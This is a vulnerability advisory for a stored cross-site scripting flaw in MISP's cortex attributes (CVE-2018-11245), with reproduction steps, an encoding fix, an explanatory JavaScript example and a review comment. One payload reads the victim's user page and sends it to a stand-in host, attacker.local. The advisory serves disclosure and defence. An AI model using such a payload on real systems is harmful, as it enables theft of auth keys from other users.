MISP – XSS with cortex type attributes
DATE
18.05.2018
Affected Vendor
CIRCL – Computer Incident Response Center Luxembourg
Affected Product
MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/
Vulnerable version
2.4.91
Fixed version
2.4.92
CVSS
6.4 Medium CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Recommendations
Update to MISP version 2.4.92
Vulnerability details
This is very dangerous because any user with permission to add attributes can attack any other user, including an administrator, and exfiltrate, for example, the victim's auth key.
The attack requires the victim to visit the crafted event and click on the attribute, but it is very easy to conduct.
The easiest way to reproduce it:
- Create an event
- Add an attribute
Category: External analysis
Type: cortex
Distribution: Inherit event
Value:
{
"jsonrpc": "2.0",
"result": "Faketext<script>alert('XSS');</script>",
"id": 1
}
- Click on the value of the newly created attribute (Cortex object)
Value of the cortex attribute:
{
"jsonrpc": "2.0",
"result": "Faketext<script>$.get('/users/view/me',function(d){pos_start = d.indexOf('<h2>User</h2>');pos_end=d.indexOf(decodeURI('%3Cdiv%20class=%22actions%20debugOff%20sideMenu%22%3E'), pos_start);if(pos_start > pos_end) pos_end = pos_start*99;interested = d.substring(pos_start, pos_end);$.get('http://attacker.local/'+escape(interested));});</script>",
"id": 1
}
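Why the attribute value from the reproduction steps reaches the browser as markup, and what encoding the pretty-printed JSON changes, as an added example that is not MISP's code. It assumes the stringified value is inserted into the page as HTML; `htmlEncode`, `htmlDecode`, `renderBeforeFix`, `renderAfterFix` and `containsMarkup` are names written for this example.

```javascript
// Added example, not MISP code. This htmlEncode is a stand-in written for the
// example; the project's own helper of that name is not shown on the page.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Inverse of htmlEncode, used only to check that the displayed text is unchanged.
function htmlDecode(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return String(s).replace(/&(amp|lt|gt|quot|#39);/g, (_, name) => map[name]);
}

// Attribute value from the reproduction steps above.
const attributeValue =
  '{"jsonrpc": "2.0", "result": "Faketext<script>alert(\'XSS\');</script>", "id": 1}';

// Before the fix: pretty-print only. JSON.stringify escapes quotes and control
// characters for JSON, but leaves < and > as they are.
function renderBeforeFix(value) {
  return JSON.stringify(JSON.parse(value), null, 2);
}

// After the fix: the same pretty-printed text, HTML-encoded as a whole.
function renderAfterFix(value) {
  return htmlEncode(JSON.stringify(JSON.parse(value), null, 2));
}

// Assumption: the result is inserted into the page as HTML, so any "<" that
// starts a tag, closing tag or comment would be parsed as markup.
function containsMarkup(html) {
  return /<[a-zA-Z\/!]/.test(html);
}

console.log(containsMarkup(renderBeforeFix(attributeValue)));
console.log(containsMarkup(renderAfterFix(attributeValue)));
console.log(renderAfterFix(attributeValue));
```

Decoding the encoded output gives back exactly the pretty-printed JSON, so the user sees the same text while the browser parses no tags from it.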
Here is a fix:
root@misp:/var/www/MISP/app/webroot/js# diff misp.js misp.js.fix
3163c3163
< cortex_data = JSON.stringify(cortex_data, null, 2);
---
> cortex_data = htmlEncode(JSON.stringify(cortex_data, null, 2));
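Review bot: The changed line 3163 depends entirely on htmlEncode, and neither its definition nor the place where cortex_data is written into the page is visible in this diff. Confirm that htmlEncode escapes &, <, > and both quote characters, and that no other code path hands the unencoded JSON.stringify output to an HTML sink. Encoding the whole pretty-printed string (rather than individual fields) is the right place for it, since it covers keys as well as values; if the sink only ever displays text, setting it through a text-only API would remove the reliance on the encoder altogether.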
CVE
CVE-2018-11245
Credits
Dawid Czarnecki